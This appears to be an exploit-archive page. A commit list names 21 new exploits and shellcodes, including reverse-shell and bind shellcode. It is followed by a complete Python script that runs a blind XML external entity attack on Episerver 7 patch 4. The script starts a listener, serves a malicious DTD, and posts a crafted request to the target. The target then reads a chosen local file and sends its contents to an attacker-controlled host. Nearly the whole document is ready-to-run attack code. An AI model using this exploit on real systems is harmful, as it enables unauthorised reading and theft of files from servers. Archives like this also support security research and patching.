444206a6be
21 changes to exploits/shellcodes NASA openVSP 3.16.1 - Denial of Service (PoC) Immunity Debugger 1.85 - Denial of Service (PoC) ipPulse 1.92 - 'TCP Port' Denial of Service (PoC) Fathom 2.4 - Denial Of Service (PoC) Skype Empresarial Office 365 16.0.10730.20053 - 'Dirección de inicio de sesión' Denial of service (PoC) Cisco AnyConnect Secure Mobility Client 4.6.01099 - 'Introducir URL' Denial of Service (PoC) HD Tune Pro 5.70 - Denial of Service (PoC) Drive Power Manager 1.10 - Denial Of Service (PoC) Easy PhotoResQ 1.0 - Denial Of Service (PoC) Trillian 6.1 Build 16 - _Sign In_ Denial of service (PoC) SIPP 3.3 - Stack-Based Buffer Overflow R 3.4.4 - Buffer Overflow (SEH) Eaton Xpert Meter 13.4.0.10 - SSH Private Key Disclosure phpMyAdmin 4.7.x - Cross-Site Request Forgery Episerver 7 patch 4 - XML External Entity Injection Argus Surveillance DVR 4.0.0.0 - Directory Traversal Linux/MIPS64 - execve(/bin/sh) Shellcode (48 bytes) Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (32 Bytes) Linux/x86 - Dual Network Stack (IPv4 and IPv6) Bind TCP Shellcode Linux/x86 - IPv6 Reverse TCP Shellcode Generator (94 bytes) Windows/x64 (10) - WoW64 Egghunter Shellcode (50 bytes)
113 lines
No EOL
3.2 KiB
Python
Executable file
113 lines
No EOL
3.2 KiB
Python
Executable file
# Exploit Title: Episerver 7 patch 4 - XML External Entity Injection
|
|
# Google Dork: N/A
|
|
# Date: 2018-08-28
|
|
# Exploit Author: Jonas Lejon
|
|
# Vendor Homepage: https://www.episerver.se/
|
|
# Version: Episerver 7 patch 4 and below
|
|
# CVE : N/A
|
|
|
|
## episploit.py - Blind XXE file read exploit for Episerver 7 patch 4 and below
|
|
## Starts a listening webserver, so the exploits needs a public IP and unfiltered port, configure RHOST below!
|
|
## Usage: ./episploit.py <target> [file-to-read]
|
|
|
|
#!/usr/bin/python
|
|
|
|
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
|
|
import urllib
|
|
import re
|
|
import sys
|
|
import time
|
|
import threading
|
|
import socket
|
|
|
|
SERVER_SOCKET = ('0.0.0.0', 8000)
|
|
EXFIL_FILE = 'file:///c:/windows/win.ini'
|
|
|
|
# The public facing IP. Change this
|
|
RHOST = '1.2.3.4:' + str(SERVER_SOCKET[1])
|
|
|
|
EXFILTRATED_EVENT = threading.Event()
|
|
|
|
class BlindXXEServer(BaseHTTPRequestHandler):
|
|
|
|
def response(self, **data):
|
|
code = data.get('code', 200)
|
|
content_type = data.get('content_type', 'text/plain')
|
|
body = data.get('body', '')
|
|
|
|
self.send_response(code)
|
|
self.send_header('Content-Type', content_type)
|
|
self.end_headers()
|
|
self.wfile.write(body.encode('utf-8'))
|
|
self.wfile.close()
|
|
|
|
def do_GET(self):
|
|
self.request_handler(self)
|
|
|
|
def do_POST(self):
|
|
self.request_handler(self)
|
|
|
|
def log_message(self, format, *args):
|
|
return
|
|
|
|
def request_handler(self, request):
|
|
global EXFILTRATED_EVENT
|
|
|
|
path = urllib.unquote(request.path).decode('utf8')
|
|
m = re.search('\/\?exfil=(.*)', path, re.MULTILINE)
|
|
if m and request.command.lower() == 'get':
|
|
data = path[len('/?exfil='):]
|
|
print 'Exfiltrated %s:' % EXFIL_FILE
|
|
print '-' * 30
|
|
print urllib.unquote(data).decode('utf8')
|
|
print '-' * 30 + '\n'
|
|
self.response(body='true')
|
|
|
|
EXFILTRATED_EVENT.set()
|
|
|
|
elif request.path.endswith('.dtd'):
|
|
print 'Sending malicious DTD file.'
|
|
dtd = '''<!ENTITY %% param_exfil SYSTEM "%(exfil_file)s">
|
|
<!ENTITY %% param_request "<!ENTITY exfil SYSTEM 'http://%(exfil_host)s/?exfil=%%param_exfil;'>">
|
|
%%param_request;''' % {'exfil_file' : EXFIL_FILE, 'exfil_host' : RHOST}
|
|
|
|
self.response(content_type='text/xml', body=dtd)
|
|
|
|
else:
|
|
print '[INFO] %s %s' % (request.command, request.path)
|
|
self.response(body='false')
|
|
|
|
def send_stage1(target):
|
|
content = '''<?xml version="1.0"?><!DOCTYPE foo SYSTEM "http://''' + RHOST + '''/test.dtd"><foo>&exfil;</foo>'''
|
|
payload = '''POST /util/xmlrpc/Handler.ashx?pageid=1023 HTTP/1.1
|
|
Host: ''' + target + '''
|
|
User-Agent: curl/7.54.0
|
|
Accept: */*
|
|
Content-Length: ''' + str(len(content)) + '''
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Connection: close
|
|
|
|
''' + content
|
|
|
|
print "Sending payload.."
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
port = 80
|
|
s.connect((target,port))
|
|
s.send(payload)
|
|
|
|
def main(target):
|
|
server = HTTPServer(SERVER_SOCKET, BlindXXEServer)
|
|
thread = threading.Thread(target=server.serve_forever)
|
|
thread.daemon = True
|
|
thread.start()
|
|
send_stage1(target)
|
|
|
|
while not EXFILTRATED_EVENT.is_set():
|
|
pass
|
|
|
|
if __name__ == '__main__':
|
|
if len(sys.argv) > 1:
|
|
target = sys.argv[1]
|
|
if len(sys.argv) > 2:
|
|
EXFIL_FILE = sys.argv[2]
|
|
main(target) |